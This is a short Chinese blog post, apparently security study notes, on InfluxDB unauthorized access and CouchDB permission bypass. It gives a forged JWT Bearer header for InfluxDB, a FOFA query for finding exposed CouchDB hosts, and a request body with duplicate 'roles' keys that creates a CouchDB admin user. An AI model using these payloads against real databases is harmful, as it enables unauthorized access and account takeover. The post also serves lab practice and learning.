当前位置:网站首页>Influxdb未授权访问&CouchDB权限绕过
Influxdb未授权访问&CouchDB权限绕过
2022-07-24 07:17:00 【无聊的知识】
Influxdb-未授权访问
默认端口:8086 8088
借助https://jwt.io/来生成jwt token:
登录的时候抓个包
然后在数据中添加一个部分
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJuYW1lIjoiYWRtaW4iLCJpYXQiOjE2NzEyNTIxMjN9.Y9i99OpSWOInZqmBpQAvr2ymmsWG2dZZDYkz9RzrCk0
这时候就可以查数据了
CouchDB-权限绕过
FOFA可以怎么去试试
对应版本最好不要高于1.7.0
“CouchDB” && port=“5984”
未授权的
在地址后面加上
_utils/#
还要另外一个是需要抓数据包的
数据包中需要添加两个东西
/_users/org.couchdb.user:vulhub
{
"type": "user",
"name": "vulhub",
"roles": ["_admin"],
"roles": [],
"passwor": "123456"
}
当我们发送数据包,可以看见一个OK的时候啊
就可能用户添加成功了
你就可以尝试去登录一下
边栏推荐
- Jenkins 详细部署
- Who can stand it when the project goes online
- 编译与调试(gcc,g++,gdb)
- Customization or GM, what is the future development trend of SaaS in China?
- Decompress the anchor and enjoy 4000w+ playback, adding a new wind to the Kwai food track?
- django.db.utils. OperationalError: (2002, “Can‘t connect to local MySQL server through socket ‘/var/r
- Paper reading: hardnet: a low memory traffic network
- Compilation and debugging (GCC, g++, GDB)
- [PTA] group programming ladder competition - Summary of exercises L3 (incomplete)
- 安全工具之hackingtool
猜你喜欢
Pytorch deep learning practice lesson 10 / assignment (basic CNN)
My creation anniversary
mysql查询当前节点的所有父级
QoS quality of service 4 traffic regulation of QoS boundary behavior
17. What is the situation of using ArrayList or LinkedList?
变量和数据类型(04)完结
解压主播狂揽4000w+播放,快手美食赛道又添新风向?
第一部分—C语言基础篇_11. 综合项目-贪吃蛇
全国职业院校技能大赛网络安全B模块 Windows操作系统渗透测试
cookie_session
随机推荐
fopen、fwrite、fseek、ftell、fread使用demo
变量和数据类型(03)
使用堡垒机(跳板机)登录服务器
拉普拉斯(Laplace)分布
Riotboard development board series notes (IX) -- buildreoot porting matchbox
Take you step by step to learn C (one)
JS_实现多行文本根据换行分隔成数组
Nacos的高级部分
Jay Chou's live broadcast was watched by more than 6.54 million people, with a total interaction volume of 450million, helping Kwai break the record again
C language from entry to soil function
SPI - send 16 bit and 8-bit data
安全工具之hackingtool
【FreeRTOS】11 软件定时器
mysql查询当前节点的所有父级
B. Also Try Minecraft
Mongodb application scenario and model selection (massive data storage model selection)
[sequential logic circuit] - register
我的创作纪念日
Gimp custom screenshot
给一个字符串 ① 请统计出其中每一个字母出现的次数② 请打印出字母次数最多的那一对